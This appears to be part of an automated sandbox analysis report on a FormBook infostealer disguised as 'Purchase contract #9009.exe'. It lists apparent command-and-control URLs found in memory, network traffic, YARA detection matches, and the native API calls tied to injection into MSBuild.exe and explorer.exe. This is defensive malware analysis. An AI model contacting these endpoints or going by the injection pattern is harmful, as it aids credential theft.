Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/display.cfm
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/fashion_trends.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=1
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp	String found in binary or memory: http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVy
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Purchase contract #9009.exe, 00000001.00000003.641815533.00000000054C6000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase contract #9009.exe

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004181C0 NtCreateFile,		4_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00418270 NtReadFile,		4_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004182F0 NtClose,		4_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004183A0 NtAllocateVirtualMemory,		4_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041826C NtReadFile,		4_2_0041826C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00418215 NtCreateFile,		4_2_00418215
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004182EA NtClose,		4_2_004182EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		4_2_015E9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E99A0 NtCreateSection,LdrInitializeThunk,		4_2_015E99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9840 NtDelayExecution,LdrInitializeThunk,		4_2_015E9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9860 NtQuerySystemInformation,LdrInitializeThunk,		4_2_015E9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E98F0 NtReadVirtualMemory,LdrInitializeThunk,		4_2_015E98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9A50 NtCreateFile,LdrInitializeThunk,		4_2_015E9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9A00 NtProtectVirtualMemory,LdrInitializeThunk,		4_2_015E9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9A20 NtResumeThread,LdrInitializeThunk,		4_2_015E9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9540 NtReadFile,LdrInitializeThunk,		4_2_015E9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E95D0 NtClose,LdrInitializeThunk,		4_2_015E95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9710 NtQueryInformationToken,LdrInitializeThunk,		4_2_015E9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9FE0 NtCreateMutant,LdrInitializeThunk,		4_2_015E9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9780 NtMapViewOfSection,LdrInitializeThunk,		4_2_015E9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E97A0 NtUnmapViewOfSection,LdrInitializeThunk,		4_2_015E97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9660 NtAllocateVirtualMemory,LdrInitializeThunk,		4_2_015E9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E96E0 NtFreeVirtualMemory,LdrInitializeThunk,		4_2_015E96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9950 NtQueueApcThread,		4_2_015E9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E99D0 NtCreateProcessEx,		4_2_015E99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015EB040 NtSuspendThread,		4_2_015EB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9820 NtEnumerateKey,		4_2_015E9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E98A0 NtWriteVirtualMemory,		4_2_015E98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9B00 NtSetValueKey,		4_2_015E9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015EA3B0 NtGetContextThread,		4_2_015EA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9A10 NtQuerySection,		4_2_015E9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9A80 NtOpenDirectoryObject,		4_2_015E9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9560 NtWriteFile,		4_2_015E9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015EAD30 NtSetContextThread,		4_2_015EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9520 NtWaitForSingleObject,		4_2_015E9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E95F0 NtQueryInformationFile,		4_2_015E95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9770 NtSetInformationFile,		4_2_015E9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015EA770 NtOpenThread,		4_2_015EA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9760 NtOpenProcess,		4_2_015E9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015EA710 NtOpenProcessToken,		4_2_015EA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9730 NtQueryVirtualMemory,		4_2_015E9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9650 NtQueryValueKey,		4_2_015E9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9670 NtQueryInformationProcess,		4_2_015E9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E9610 NtEnumerateValueKey,		4_2_015E9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E96D0 NtCreateKey,		4_2_015E96D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B395D0 NtClose,LdrInitializeThunk,		9_2_04B395D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39540 NtReadFile,LdrInitializeThunk,		9_2_04B39540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,		9_2_04B396E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B396D0 NtCreateKey,LdrInitializeThunk,		9_2_04B396D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,		9_2_04B39660
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39650 NtQueryValueKey,LdrInitializeThunk,		9_2_04B39650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,		9_2_04B39780
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,		9_2_04B39FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,		9_2_04B39710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,		9_2_04B39860
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39840 NtDelayExecution,LdrInitializeThunk,		9_2_04B39840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B399A0 NtCreateSection,LdrInitializeThunk,		9_2_04B399A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,		9_2_04B39910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39A50 NtCreateFile,LdrInitializeThunk,		9_2_04B39A50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B395F0 NtQueryInformationFile,		9_2_04B395F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B3AD30 NtSetContextThread,		9_2_04B3AD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39520 NtWaitForSingleObject,		9_2_04B39520
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39560 NtWriteFile,		9_2_04B39560
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39610 NtEnumerateValueKey,		9_2_04B39610
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39670 NtQueryInformationProcess,		9_2_04B39670
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B397A0 NtUnmapViewOfSection,		9_2_04B397A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39730 NtQueryVirtualMemory,		9_2_04B39730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B3A710 NtOpenProcessToken,		9_2_04B3A710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B3A770 NtOpenThread,		9_2_04B3A770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39770 NtSetInformationFile,		9_2_04B39770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39760 NtOpenProcess,		9_2_04B39760
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B398A0 NtWriteVirtualMemory,		9_2_04B398A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B398F0 NtReadVirtualMemory,		9_2_04B398F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39820 NtEnumerateKey,		9_2_04B39820
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B3B040 NtSuspendThread,		9_2_04B3B040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B399D0 NtCreateProcessEx,		9_2_04B399D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39950 NtQueueApcThread,		9_2_04B39950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39A80 NtOpenDirectoryObject,		9_2_04B39A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39A20 NtResumeThread,		9_2_04B39A20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39A10 NtQuerySection,		9_2_04B39A10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39A00 NtProtectVirtualMemory,		9_2_04B39A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B3A3B0 NtGetContextThread,		9_2_04B3A3B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B39B00 NtSetValueKey,		9_2_04B39B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB82F0 NtClose,		9_2_02EB82F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB8270 NtReadFile,		9_2_02EB8270
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB83A0 NtAllocateVirtualMemory,		9_2_02EB83A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB81C0 NtCreateFile,		9_2_02EB81C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB82EA NtClose,		9_2_02EB82EA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB826C NtReadFile,		9_2_02EB826C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB8215 NtCreateFile,		9_2_02EB8215

Detected potential crypto function

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010B673		1_2_0010B673
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_00BDC27C		1_2_00BDC27C
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_00BDEC58		1_2_00BDEC58
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_00BDEC48		1_2_00BDEC48
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_046604F8		1_2_046604F8
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_046631C9		1_2_046631C9
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04660B48		1_2_04660B48
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_046604E8		1_2_046604E8
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04661600		1_2_04661600
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04661C05		1_2_04661C05
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04660EF1		1_2_04660EF1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04660F00		1_2_04660F00
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_046619F1		1_2_046619F1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04660B39		1_2_04660B39
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_04661BAF		1_2_04661BAF
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010B6C0		1_2_0010B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00401030		4_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B909		4_2_0041B909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00408C60		4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00408C64		4_2_00408C64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00402D88		4_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00402D90		4_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041CE65		4_2_0041CE65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00402FB0		4_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AF900		4_2_015AF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C4120		4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167E824		4_2_0167E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661002		4_2_01661002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016728EC		4_2_016728EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BB090		4_2_015BB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016720A8		4_2_016720A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CAB40		4_2_015CAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01672B28		4_2_01672B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166DBD2		4_2_0166DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016603DA		4_2_016603DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DEBB0		4_2_015DEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0165FA2B		4_2_0165FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016722AE		4_2_016722AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01671D55		4_2_01671D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01672D07		4_2_01672D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A0D20		4_2_015A0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016725DD		4_2_016725DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BD5E0		4_2_015BD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2581		4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166D466		4_2_0166D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B841F		4_2_015B841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01671FF1		4_2_01671FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167DFCE		4_2_0167DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C6E30		4_2_015C6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166D616		4_2_0166D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01672EF7		4_2_01672EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0841F		9_2_04B0841F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBD466		9_2_04BBD466
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B22581		9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0D5E0		9_2_04B0D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC25DD		9_2_04BC25DD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF0D20		9_2_04AF0D20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC2D07		9_2_04BC2D07
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC1D55		9_2_04BC1D55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC2EF7		9_2_04BC2EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B16E30		9_2_04B16E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBD616		9_2_04BBD616
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC1FF1		9_2_04BC1FF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BCDFCE		9_2_04BCDFCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC20A8		9_2_04BC20A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0B090		9_2_04B0B090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC28EC		9_2_04BC28EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1A830		9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BCE824		9_2_04BCE824
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1002		9_2_04BB1002
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B199BF		9_2_04B199BF
